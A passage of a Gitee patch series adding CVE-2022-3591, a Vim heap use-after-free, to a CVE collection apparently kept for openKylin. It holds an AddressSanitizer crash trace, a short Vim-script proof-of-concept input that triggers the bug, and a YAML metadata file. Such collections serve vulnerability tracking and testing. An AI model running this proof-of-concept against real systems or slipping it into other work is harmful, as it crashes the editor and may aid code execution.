0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #16 0x55f4ac001c18 in apply_autocmds_group /home/fuzz/vim/src/autocmd.c:2232 + #17 0x55f4ac000401 in apply_autocmds /home/fuzz/vim/src/autocmd.c:1710 + #18 0x55f4ac3a3fce in did_set_string_option /home/fuzz/vim/src/optionstr.c:2540 + #19 0x55f4ac399413 in set_string_option /home/fuzz/vim/src/optionstr.c:538 + #20 0x55f4ac38203f in set_option_value /home/fuzz/vim/src/option.c:4378 + #21 0x55f4ac382284 in set_option_value_give_err /home/fuzz/vim/src/option.c:4423 + #22 0x55f4ac3f61df in qf_fill_buffer /home/fuzz/vim/src/quickfix.c:4855 + #23 0x55f4ac3f3eea in ex_copen /home/fuzz/vim/src/quickfix.c:4372 + #24 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #25 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #26 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #27 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #28 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #29 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + +SUMMARY: AddressSanitizer: heap-use-after-free /home/fuzz/vim/src/quickfix.c:1932 in qf_get_curlist +Shadow bytes around the buggy address: + 0x0c3680003780: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c3680003790: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c36800037a0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa + 0x0c36800037b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c36800037c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c36800037d0: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c36800037e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c36800037f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c3680003800: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c3680003810: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c3680003820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb + Shadow gap: cc +==147326==ABORTING +``` + **影响** +Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. -- Gitee From a7c59c7109e9f2ca06da222f35c8cc55963a0bef Mon Sep 17 00:00:00 2001 From: Mz_zM Date: Thu, 27 Apr 2023 15:18:55 +0000 Subject: [PATCH 04/11] rename cve/vim/2022/CVE-2022-3591/README.md to cve/vim/2022/CVE-2022-3591/poc14_huaf.dat. Signed-off-by: Mz_zM --- cve/vim/2022/CVE-2022-3591/{README.md => poc14_huaf.dat} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/vim/2022/CVE-2022-3591/{README.md => poc14_huaf.dat} (100%) diff --git a/cve/vim/2022/CVE-2022-3591/README.md b/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat similarity index 100% rename from cve/vim/2022/CVE-2022-3591/README.md rename to cve/vim/2022/CVE-2022-3591/poc14_huaf.dat -- Gitee From cddc1d48cf2bbcd1a6207ee76a688e5a8c009f6d Mon Sep 17 00:00:00 2001 From: Mz_zM Date: Thu, 27 Apr 2023 15:19:51 +0000 Subject: [PATCH 05/11] update cve/vim/2022/CVE-2022-3591/poc14_huaf.dat. Signed-off-by: Mz_zM --- cve/vim/2022/CVE-2022-3591/{poc14_huaf.dat => README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/vim/2022/CVE-2022-3591/{poc14_huaf.dat => README.md} (100%) diff --git a/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat b/cve/vim/2022/CVE-2022-3591/README.md similarity index 100% rename from cve/vim/2022/CVE-2022-3591/poc14_huaf.dat rename to cve/vim/2022/CVE-2022-3591/README.md -- Gitee From e217c5a5f8b6a55f977e978d86a462c04021be10 Mon Sep 17 00:00:00 2001 From: Mz_zM Date: Thu, 27 Apr 2023 15:20:12 +0000 Subject: [PATCH 06/11] add cve/vim/2022/CVE-2022-3591. Signed-off-by: Mz_zM --- cve/vim/2022/CVE-2022-3591/poc14_huaf.dat | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/vim/2022/CVE-2022-3591/poc14_huaf.dat diff --git a/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat b/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat new file mode 100644 index 00000000..e69de29b -- Gitee From fcee7d1c1dbc2668c0609e4687ba2f3f24a68043 Mon Sep 17 00:00:00 2001 From: Mz_zM Date: Thu, 27 Apr 2023 15:20:38 +0000 Subject: [PATCH 07/11] update cve/vim/2022/CVE-2022-3591/poc14_huaf.dat. Signed-off-by: Mz_zM --- cve/vim/2022/CVE-2022-3591/poc14_huaf.dat | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat b/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat index e69de29b..7b8970d1 100644 --- a/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat +++ b/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat @@ -0,0 +1,7 @@ +com-c Xo lol +0scr +so +Xo +lex'' +lop +au FileType * cal setloclist(0,[],'f') \ No newline at end of file -- Gitee From de411edce8298249438b48554d8fecf33be1f1a8 Mon Sep 17 00:00:00 2001 From: Mz_zM Date: Fri, 28 Apr 2023 04:37:39 +0000 Subject: [PATCH 08/11] add cve/vim/2022/yaml/CVE-2022-3591.yaml. Signed-off-by: Mz_zM --- cve/vim/2022/yaml/CVE-2022-3591.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/vim/2022/yaml/CVE-2022-3591.yaml diff --git a/cve/vim/2022/yaml/CVE-2022-3591.yaml b/cve/vim/2022/yaml/CVE-2022-3591.yaml new file mode 100644 index 00000000..e69de29b -- Gitee From 4aa2f6fe5ce40cede437870d9657d1a0093b734a Mon Sep 17 00:00:00 2001 From: Mz_zM Date: Fri, 28 Apr 2023 04:50:14 +0000 Subject: [PATCH 09/11] update cve/vim/2022/yaml/CVE-2022-3591.yaml. Signed-off-by: Mz_zM --- cve/vim/2022/yaml/CVE-2022-3591.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/cve/vim/2022/yaml/CVE-2022-3591.yaml b/cve/vim/2022/yaml/CVE-2022-3591.yaml index e69de29b..844f5dce 100644 --- a/cve/vim/2022/yaml/CVE-2022-3591.yaml +++ b/cve/vim/2022/yaml/CVE-2022-3591.yaml @@ -0,0 +1,19 @@ +id: CVE-2022-3991 +source: https://huntr.dev/bounties/a5a998c2-4b07-47a7-91be-dbc1886b3921 +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: High + description: | + Use After Free in function at buffer.c:5715 . + scope-of-influence: + vim<9.0.0789 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-3591 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-3591 + cwe-id: CWE-416 + cnvd-id: None + kve-id: None + tags: cve2022, buffer overflow \ No newline at end of file -- Gitee From bacf6cac95bbc60ad798861cb10a3744c91fa513 Mon Sep 17 00:00:00 2001 From: Mz_zM Date: Thu, 4 May 2023 14:03:16 +0000 Subject: [PATCH 10/11] update cve/vim/2022/yaml/CVE-2022-3591.yaml. Signed-off-by: Mz_zM --- cve/vim/2022/yaml/CVE-2022-3591.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/vim/2022/yaml/CVE-2022-3591.yaml b/cve/vim/2022/yaml/CVE-2022-3591.yaml index 844f5dce..cc783981 100644 --- a/cve/vim/2022/yaml/CVE-2022-3591.yaml +++ b/cve/vim/2022/yaml/CVE-2022-3591.yaml @@ -1,4 +1,4 @@ -id: CVE-2022-3991 +id: CVE-2022-3591 source: https://huntr.dev/bounties/a5a998c2-4b07-47a7-91be-dbc1886b3921 info: name: Vim是一款基于UNIX平台的编辑器。 -- Gitee From c8f6076c812cd22170b1d5fafee231c67b2c6d73 Mon Sep 17 00:00:00 2001 From: Mz_zM Date: Thu, 4 May 2023 14:29:35 +0000 Subject: [PATCH 11/11] update openkylin_list.yaml. Signed-off-by: Mz_zM --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 9b6a0f88..560bce4d 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -121,6 +121,7 @@ cve: - CVE-2022-2264 - CVE-2022-2598 - CVE-2022-3234 + - CVE-2022-3591 - CVE-2023-0433 - CVE-2023-1355 - CVE-2023-0049 -- Gitee